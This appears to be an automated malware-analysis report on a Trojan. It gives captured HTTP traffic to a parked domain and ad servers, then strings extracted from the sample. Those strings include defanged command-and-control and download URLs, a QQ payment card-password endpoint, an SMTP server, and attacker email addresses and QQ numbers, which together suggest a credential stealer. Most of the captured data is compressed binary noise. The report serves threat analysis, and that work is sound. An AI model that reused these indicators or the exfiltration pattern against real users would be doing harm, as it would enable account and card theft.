X-Content-Type-Options: nosniff

Content-Encoding: gzip

Date: Sat, 13 Sep 2014 02:31:37 GMT

Server: domainserver

Cache-Control: private

Content-Length: 621

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic,p=0.002
...........Tmo.0.......4.....B..K;$J*....)r..\.8./....g...1._.{r..sw.[
.zQ7.v.'3.Rr......6.{<.2..{.K|;$......G...bq..r.....6S.....`....H..
]iy......V....l..R-B..9B.....J...)./..5..qc........(r.AH.Q'....F.`....
.Qt.......D..cC..@....).3.C.k.d.Q..t.vb...oQ..DK.xMK.K..,r..........8B
.V......f.m9.-.m.../D*....K,..(.R.;..s.0..GP.BvkR...H..2..!...YpCv.N..
..\.^X?.....du........`6....H..}*O)xa.G..P.*1G..\.SzI..P'T..uv%.....Vv
..=0..:s.S..{`....Ke.<.;.On..f.O..........ux.cO..g...5..r.z1....A.O
........./iE.^RZ...s..]RL....J...>..o.$.r.....;.Xn.C..m..%8.gg.....
...!.&.....o....;....n........3.....&u.Un..........Z.o..........G.....
..

GET /static/caf/slave.html HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: dp.g.doubleclick.net

Connection: Keep-Alive

Cookie: id=c21c6444d00007f||t=1360768149|et=730|cs=002213fd480b36e81315d0d96e


HTTP/1.1 200 OK

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/html

Last-Modified: Wed, 18 Sep 2013 22:34:18 GMT

Date: Sat, 13 Sep 2014 02:20:06 GMT

Expires: Sat, 13 Sep 2014 03:20:06 GMT

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 706

X-XSS-Protection: 1; mode=block

Age: 690

Cache-Control: public, max-age=3600

Alternate-Protocol: 80:quic,p=0.002

X-Google-Cookies-Blocked: id=
...........U.n.@.}.WL.!.E.M.<T.S.K.$..8J J$.....v.k....]_..hS?...3g
.\.4.u.m.......0zl.{m :.O.mJ;V....>\...(.......5....X].!.SkLS. ...9
.p.K.g..q..,6O;..m=s. ...m...P...u..xK..C&....DH..w&...Y.:8...(.G.V.D.
.f.h...5..Jn.ao..~y.......>I<M.*n.....].../d..>F......o.p/. .
.B..{i.V..H.1K..<.. #.6... ..2\A...j.1...j...9d..<.Cw.l...<.$
...C.g.C..g.=.V.E....e.2......./.c.......,........q.*}Vc.^....i...R.~.
.d..$........'...|.o..X..e&o....*.......;]..>~..>c..Z:.m...:R...
.j"..D...@!.vL7..4.W*....#7W.r.@M}<....W.p7|ds...Z.0O..7G.Jq....c..
..o.uM.|.Q$.......|..d.E....w.u.Y.....c...c..Fe*..N....S..y/K.yz r....
v...;ezX.cD.t..uo.OI..yK`0..yxK...W.'{....0J..VA.....!.qC'..Q..u}L..M.
U..R...hx.!...j&`...k .....yv.....-n.......


GET /static/caf/slave.html HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: dp.g.doubleclick.net

Connection: Keep-Alive

Cookie: id=c21c6444d00007f||t=1360768149|et=730|cs=002213fd480b36e81315d0d96e


HTTP/1.1 200 OK

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/html

Last-Modified: Wed, 18 Sep 2013 22:34:18 GMT

Date: Sat, 13 Sep 2014 02:20:06 GMT

Expires: Sat, 13 Sep 2014 03:20:06 GMT

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 706

X-XSS-Protection: 1; mode=block

Age: 690

Cache-Control: public, max-age=3600

Alternate-Protocol: 80:quic,p=0.002

X-Google-Cookies-Blocked: id=
...........U.n.@.}.WL.!.E.M.<T.S.K.$..8J J$.....v.k....]_..hS?...3g
.\.4.u.m.......0zl.{m :.O.mJ;V....>\...(.......5....X].!.SkLS. ...9
.p.K.g..q..,6O;..m=s. ...m...P...u..xK..C&....DH..w&...Y.:8...(.G.V.D.
.f.h...5..Jn.ao..~y.......>I<M.*n.....].../d..>F......o.p/. .
.B..{i.V..H.1K..<.. #.6... ..2\A...j.1...j...9d..<.Cw.l...<.$
...C.g.C..g.=.V.E....e.2......./.c.......,........q.*}Vc.^....i...R.~.
.d..$........'...|.o..X..e&o....*.......;]..>~..>c..Z:.m...:R...
.j"..D...@!.vL7..4.W*....#7W.r.@M}<....W.p7|ds...Z.0O..7G.Jq....c..
..o.uM.|.Q$.......|..d.E....w.u.Y.....c...c..Fe*..N....S..y/K.yz r....
v...;ezX.cD.t..uo.OI..yK`0..yxK...W.'{....0J..VA.....!.qC'..Q..u}L..M.
U..R...hx.!...j&`...k .....yv.....-n.......


GET /apps/domainpark/domainpark.cgi?max_radlink_len=20&r=m&fexp=21404&client=dp-dopa15_3ph_js&channel=001623&hl=ru&adtest=off&type=0&optimize_terms=on&drid=as-drid-2246028460856896&uiopt=false&oe=UTF-8&ie=UTF-8&format=p6|r24|r12|s&ad=a6&adrep=2&num=0&output=caf&domain_name=VVV.cf089.com&v=3&allwcallad=1&adext=as1,sr1,ctc1&cd_oi=true&u_his=0&u_tz=180&dt=1410575496813&u_w=1024&u_h=768&biw=292&bih=140&psw=1020&psh=312&frm=0&uio=uv3cs1fa2sa20sl1sr1cc1-af3wi1000ff1st24sd12sv11sa12lt40ld40lv30-wi1010ff1st16sa12lt38-wi1010ff1st16sa12lt38-&rurl=http://VVV.cf089.com/Â³Ã‰Â¹Â¦ÃÃ…ÃÂ¢.html HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: dp.g.doubleclick.net

Connection: Keep-Alive

Cookie: id=c21c6444d00007f||t=1360768149|et=730|cs=002213fd480b36e81315d0d96e


HTTP/1.1 200 OK

P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Content-Type: text/html; charset=UTF-8

X-Content-Type-Options: nosniff

Content-Encoding: gzip

Date: Sat, 13 Sep 2014 02:31:36 GMT

Server: domainserver

Cache-Control: private

Content-Length: 621

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic,p=0.002
...........Tmo.0.......4.....B..K;$J*....)r..\.8./....g...1._.{r..sw.[
.zQ7.v.'3.Rr......6.{<.2..{.K|;$......G...bq..r.....6S.....`....H..
]iy......V....l..R-B..9B.....J...)./..5..qc........(r.AH.Q'....F.`....
.Qt.......D..cC..@....).3.C.k.d.Q..t.vb...oQ..DK.xMK.K..,r..........8B
.V......f.m9.-.m.../D*....K,..(.R.;..s.0..GP.BvkR...H..2..!...YpCv.N..
..\.^X?.....du........`6....H..}*O)xa.G..P.*1G..\.SzI..P'T..uv%.....Vv
..=0..:s.S..{`....Ke.<.;.On..f.O..........ux.cO..g...5..r.z1....A.O
........./iE.^RZ...s..]RL....J...>..o.$.r.....;.Xn.C..m..%8.gg.....
...!.&.....o....;....n........3.....&u.Un..........Z.o..........G.....
HTTP/1.1 200 OK..P3P: policyref="hXXp://googleads.g.doubleclick.net/pa
gead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR 
INT DEM STA PRE COM NAV OTC NOI DSP COR"..Content-Type: text/html; cha
rset=UTF-8..X-Content-Type-Options: nosniff..Content-Encoding: gzip..D
ate: Sat, 13 Sep 2014 02:31:36 GMT..Server: domainserver..Cache-Contro
l: private..Content-Length: 621..X-XSS-Protection: 1; mode=block..Alte
rnate-Protocol: 80:quic,p=0.002.............Tmo.0.......4.....B..K;$J*
....)r..\.8./....g...1._.{r..sw.[.zQ7.v.'3.Rr......6.{<.2..{.K|;$..
....G...bq..r.....6S.....`....H..]iy......V....l..R-B..9B.....J...)./.
.5..qc........(r.AH.Q'....F.`.....Qt.......D..cC..@....).3.C.k.d.Q..t.
vb...oQ..DK.xMK.K..,r..........8B.V......f.m9.-.m.../D*....K,..(.R.;..
s.0..GP.BvkR...H..2..!...YpCv.N....\.^X?.....du........`6....H..}*O)xa
.G..P.*1G..\.SzI..P'T..uv%.....Vv..=0..:s.S..{`....Ke.<.;.On..f<<< skipped >>>

GET /adsense/domains/caf.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.google.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

Vary: Accept-Encoding

Date: Sat, 13 Sep 2014 02:31:34 GMT

Expires: Sat, 13 Sep 2014 02:31:34 GMT

Cache-Control: private, max-age=3600

X-Content-Type-Options: nosniff

Content-Disposition: attachment; filename="f.txt"

Content-Encoding: gzip

Server: amfe

Content-Length: 217

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Alternate-Protocol: 80:quic,p=0.002
..........m..j.0.F_..b{.....8..2.N.J)....`IAR...wo.....q..z.7Q...)....
z<._.....u....$..E.f.g..8|.2[.....@r#....&.Xt.^e{/....;9..1.ELZ..=x
.N...x[.w....m..k..{Y.....n...Z..n.m95]%{0.V.e<..4..W..@....]...a. 
..b..._..........


GET /ads/search/module/ads/1.0/76529756bd9c4808112d3445d4a637b160b572c9/n/domains.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.google.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

Vary: Accept-Encoding

Date: Sat, 13 Sep 2014 02:31:34 GMT

Expires: Sun, 13 Sep 2015 02:31:34 GMT

Cache-Control: public, max-age=31536000

ETag: "m76529756bd9c4808112d3445d4a637b160b572c9"

X-Content-Type-Options: nosniff

Content-Disposition: attachment; filename="f.txt"

Content-Encoding: gzip

Server: amfe

Content-Length: 56691

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Alternate-Protocol: 80:quic,p=0.002
............i{...(.=..U.....vf..o..C:$mW.duS...S%;Cc.....(YN...>...
...&....A..A...z.0...f...E. ?.....P-W....fq....Vk...k....lT6..........
..u..VqV.k.&/..{.........s/Y..!..wY....~.....a..b,.....M..3H/........]
...r___...q$...^..!.K..9:..1{..c.a...3...=.......aP4.......vLx.<...
[email protected][email protected]..,....(.....t.-...CP......9@...
.l.l...............;~.5l.......a...'..x.........hx{..A.~....}...h...s.
7..}.{.on.....HXU...yc.wb. R{#....$.U...H.a.A.........L|.v..lbus..1...
....j,.S.k..kD.#...E-.{o.[US..L~A../Q4.Ny0..e6.tn...J..L|.S..L,...l..{
...X...(....~.XA.x.Vp!..M:`;.s....LB..kw....0...;.G6./.Ro....}..S.\..Y
s..f...sF..S#..........O..^W..xg.R.)l....tpxt..y.....qn..}M...cWa....l
By.<m.......54..T..mV.r... [email protected]..........{.9.g.O....`fL.N^...}...
...%...qb]2{.k?.K.3.d.......,gK.._..s..>...~..A.FK.Cj6o..1.X..Y....
.".Y....b..f..V..M.^ /...9.,.......Z..u...k..r....D...{..54X.. ..nNC^.
..s.R.TD.O..>~e...^..........C?...f.......U....g.Z..A.7..\...t.....
.S...l..z.pt.....c..w..o..;....n*.E.....<T.....&.?....1.d..........
..l....w~Z:[<./f.[;.[.,...c...Y..N.....3...$ ..u.F.(..a...eC.]..0..
..ua/.`0..........G.....(d6&V..;dL...}.....5Ls..5......l..rA.(H~[.Y..5
..g...M..u..c1...^8..PXj.....c.....l....~.$..*...N...A....kJ.h...0r..}
..._g!.t..\...*.X.;.2..}.XK.....................c..&......1......6...O
.q...)w..Ak.t."...........G......h..dQV..,.E..gZ0...#.....>..v.a7M.
.$3...:O..c....../.KX.{....tN.Z..............`....`..A.K...Og.=:...c..
=z..cD..>..q..7.mz.U*...XW.J.F..'x.........`....f=X.....s...7@l<<< skipped >>>

GET /css/t_141_201401111.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: a1.dnbizcdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine/1.4.2

Date: Sat, 13 Sep 2014 02:31:34 GMT

Content-Type: text/css

Last-Modified: Tue, 22 Apr 2014 10:30:52 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Content-Encoding: gzip
5ff.............X...8...oG#.......^vvF...:2.. ..q.2Q.}.|..d..........S
.. /...&.'..m.R2.lOY%..9.d.6.KUOO........i.....f. ...- ....z......u...
I#.N.Iw...#......_<Y,...QQ...h....{V..-aJ..B..R..kY..y..J2....C...C
...J4|...x...Y..}IA9.*....d:...>)....g..../..e..x6%.yB.;i....9c....
.)f...J.d...Y....PJS..*.J.. .d%.2.)....{/^...\.a 9..7:y. w.....%$.d~LI
.$..........E'2Q..gKQ..A..^P....mB...Y....c.9....#-..l....s[.F.......?
j^.s.;`..NN......M...h.B.,.e=..a..S:....!:...W.x..&].dUA.hjs5.V...e J"
mr7..i.L#.e$.7@N.....\..U.X%.M.C..BA.Z4..k...S..T..g.W ..H....m..a>
|.T..xG.]b.....2......E.P......S....,s.....Z.G..D.....:v[2..*.7y.....N
T. .5.(....}I,ba.^cZ...o......r.;p.j!.....>.....).y'.....Jz.<..#
"3..Ya..%v.[C.3.}...|%@;....G.x_ @..V....R1..Pl..T.d.ICM...|^...m.`..j
p'...ba#9U..EN@[email protected]"...|......w...F........
.|p.]...$...o..U.-...`...z.z'..#..\B/.....#....*X......(PQXT..-..X\A.0
[email protected]..)...(.Ik..ud.p`2..7w..P.8$.E.... ..n...(...mF..e..D..R.9...
.J.F.7.v....... DdY...8&...][email protected]`_2.%.W(.W7v..
.)...i.t...m...E.W....F.\gC....^.... .......t.......'..C.2@>.w....i
dWh...0..,.$._|..a....n..>..!..@.}[email protected].|o,%:
.... .:/..Bx.tz...'.H\.h. ..7.`......7=..:e.t....<Zve...zX........}
t...8...........#..)..r:..6.xX..>L.p{(...g..M....~.35..f.p.T.......
.QP.......a.....S....QG......c........W<.^...$.Yb'l.D]._p.2.*.....&
lt;.'di...[.(B....L.B.:.mJ ....j...<...]~..Q.wvxo!*v>...N....rs?
.y!.............o...v6t..m...7.....p...>[email protected].....|[email protected]<<< skipped >>>

GET /js/parking_caf_141_1402251.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: a1.dnbizcdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine/1.4.2

Date: Sat, 13 Sep 2014 02:31:34 GMT

Content-Type: application/x-javascript

Last-Modified: Tue, 09 Sep 2014 02:04:48 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Content-Encoding: gzip
1e4b.............]{.....[..w.y...d.rW..V)K./[email protected]........~..g
.`@r%.I...#...........\.u4k..$.<x.....u....w .E..z.U..2/..r.$u....&
lt;m..ON...L.Y^f.pO4.mB.......... .........?..E...[.DY.d....0<..n..
....~...M.F.:....}...oVm^..X.H.......8....x...".....f...e....|......V.
.?...%k.....4..B?j.z.([email protected].[[email protected]...
.y..u\.*1...S3.........k..p..E.,..bV....2/.=......{.*] KOl.x^...!.....
.s...r..G..J.)B.$.8}^T...-.I.\V..8m......r...H.r..NN".8...z..'.kE^.^..
<#~.O...r"..J_e.....&Z.G..?C..q...........J...k....:...y...Wu.F_A'.
rn..ag..G.....hrpp..2h..u..._a.jjD n..Y..I\.Z....8........i\....}.....
..'JoD.\;I....n.b...e.i.x/..W./....4..d...U}....^.......A!.A V..g...*Z
8GGG........G/[email protected]"l.A.....UQT.......J.$..Uj
[email protected]...'iyg......'...<.....#.lb....R....)..|...q...
C..x.....c.G...1....47...K.c....s.....x.....c.3m...85..-. ..5....>c
..N.l....=.:|...V7S2..<.#.^,..4s....,m..N..[c.....4...N....H 4.u..3
.h.|d-.Y...:......."..c...M...........#..k.<..}....8.......b.......
.3i...`....C........6....*.].>*.....v........Vp.........6v.........
..N.....j.u.....w8..`..wM.e.{..C..t...$v...9p,..o...w.U...............
.x.;...v.Io....Js.;;......G...|.Mj......E.......<...o.KYli.........
.}.......C.....2..A....X....?z...~\....3.......0}.>...'..........?.
...o0{v...r......1........../.......:nA2...\[email protected]_....
...,W...CG..V....m....?4./.w..,.. 8....W..h.qa.%.`.I..0.~o..X.R..d.6.f
y....2^..8=..l...?.\C.......Vq../..."..!m2. i.g.):^#..z;o.?$.....5<<< skipped >>>

GET /img/w300/search_language_1.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.cf089.com/.........html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: a1.dnbizcdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine/1.4.2

Date: Sat, 13 Sep 2014 02:31:35 GMT

Content-Type: image/jpeg

Content-Length: 2374

Last-Modified: Tue, 09 Sep 2014 03:01:53 GMT

Connection: keep-alive

Accept-Ranges: bytes
......Exif..II*.................Ducky.......<.....ohXXp://ns.adobe.
com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&g
t; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-
c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf
="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description
 rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRe
f="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://n
s.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:2ADDD9426D4511
E39F35D78CF7C16A6F" xmpMM:DocumentID="xmp.did:A6AEF93D37CD11E4A238A243
E0DA2DE9" xmpMM:InstanceID="xmp.iid:A6AEF93C37CD11E4A238A243E0DA2DE9" 
xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedF
rom stRef:instanceID="xmp.iid:CC27718BCD37E4119925C95B4D010903" stRef:
documentID="xmp.did:2ADDD9426D4511E39F35D78CF7C16A6F"/> </rdf:De
scription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"
?>....Adobe.d......................................................
......................................................................
.....................................}................................
......................................!1....A.."..Qq2r#.a..R.C.4DTt.57
.................................?..@.................................
...................u.m(g....%<.c.H...U.J.o...b.<..s.5..lW..Y.!..
/...Uj.#f..N.c.D..(.)....w..2...K.R.....Q.......E]<P.....F.\.6.....
.tD@)S.....b.N..j..|6!.$.....{UZ.....s.T.Kn.y.U...........9.Tj'..T<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_664:

.text

`.rdata

@.data

.rsrc

@.vmp0

`.vmp1

.reloc

t$(SSh

~%UVW

u$SShe

wininet.dll

kernel32.dll

user32.dll

gdiplus.dll

ole32.dll

SkinH_EL.dll

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

EnumWindows

GdiplusShutdown

hXXp://ptlogin2.qq.com/getimage?aid=11000101&0.24514092205448612

hXXp://

hXXps://

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

http=

HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Content-Type: application/x-www-form-urlencoded

{557CF400-1A04-11D3-9A73-0000F81EF32E}

{557CF401-1A04-11D3-9A73-0000F81EF32E}

{557CF402-1A04-11D3-9A73-0000F81EF32E}

{557CF405-1A04-11D3-9A73-0000F81EF32E}

{557CF406-1A04-11D3-9A73-0000F81EF32E}

hXXp://pay.qq.com/cgi-bin/account/account_qqcard_save_qbqd.cgi

&CardPassword=

244077923

[email protected]

smtp.qq.com

[email protected]

275535028

[email protected]

[email protected]

\jl.txt

2088258269

hXXp://url.cn/RtJuQx

fJ.WM_

CX%xm

Õ6m*

n.BjCw

%s;7*

0%x@w

%C^L:

%s T5

]E4%F(

.Funr

k%UPp

fg.VG

%C',@

>Ùd

0'.Ll

[I(3/#N0.bd

j"%u=w

q%Xn`

@|H.NI

.wdd!

S|%u4

*.Ea]S

Q.CGo

fTpe

.LLbX

-.Mdl

\-A}=3K

Y:.akpS

$.Zcqn

.WE= T!N

#?%s(C(

u.Jck~

zx/%FN[

%s=\RI

}j%c%Y)

Rx.GR

4o#.dM

IeS`%C

[n 4\.UY

,4.qO,

gQ'.Io

%cLur?

s%DHB

]I%%X

5r.US

:mD].tB

f%fUZ

.fOuV12

*_.dC

&-N}<

({?.cQm

.Cqx~c

.`.Qw

**.dU

!n]%x

%X,Cr

&.PFy{xh

.um ZZE7L

/^p%u$

I.NoQY

zu.ew

D/.nT

b\SkinH_EL.dll

C$%cmb

.ppM|

 aZ.mO

%-^

.hk;~

KERNEL32.DLL

COMCTL32.dll

GDI32.dll

MSIMG32.dll

MSVCRT.dll

MSVFW32.dll

USER32.dll

hXXp://dl.vmall.com/c0y5dhl31e

Adobe Photoshop CS5 Windows

2013:09:07 18:22:27

*%xLq

urlTEXT

MsgeTEXT

hXXp://ns.adobe.com/xap/1.0/

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-09-07T18:19:34 08:00" xmp:ModifyDate="2013-09-07T18:22:27 08:00" xmp:MetadataDate="2013-09-07T18:22:27 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:69CCED64A717E31197F9D08031ECF06A" xmpMM:DocumentID="xmp.did:68CCED64A717E31197F9D08031ECF06A" xmpMM:OriginalDocumentID="xmp.did:68CCED64A717E31197F9D08031ECF06A"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:68CCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:19:34 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:69CCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:22:27 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>

%sc;-

Ljj%FZ

2013:09:07 18:41:37

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-09-07T18:19:34 08:00" xmp:ModifyDate="2013-09-07T18:41:37 08:00" xmp:MetadataDate="2013-09-07T18:41:37 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:6CCCED64A717E31197F9D08031ECF06A" xmpMM:DocumentID="xmp.did:68CCED64A717E31197F9D08031ECF06A" xmpMM:OriginalDocumentID="xmp.did:6CCCED64A717E31197F9D08031ECF06A"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:6CCCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:19:34 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>

2013:09:07 18:48:37

jkP.gN

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-09-07T18:19:34 08:00" xmp:ModifyDate="2013-09-07T18:48:37 08:00" xmp:MetadataDate="2013-09-07T18:48:37 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:6ECCED64A717E31197F9D08031ECF06A" xmpMM:DocumentID="xmp.did:68CCED64A717E31197F9D08031ECF06A" xmpMM:OriginalDocumentID="xmp.did:6ECCED64A717E31197F9D08031ECF06A"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:6ECCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:19:34 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>

JQ #%X

zt.vFM72G%

}/.OP?}

2013:09:07 18:31:24

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2013-09-07T18:19:34 08:00" xmp:ModifyDate="2013-09-07T18:31:24 08:00" xmp:MetadataDate="2013-09-07T18:31:24 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:6BCCED64A717E31197F9D08031ECF06A" xmpMM:DocumentID="xmp.did:6ACCED64A717E31197F9D08031ECF06A" xmpMM:OriginalDocumentID="xmp.did:6ACCED64A717E31197F9D08031ECF06A"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:6ACCED64A717E31197F9D08031ECF06A" stEvt:when="2013-09-07T18:19:34 08:00" stEvt:softwareAgent="Adobe Photoshop 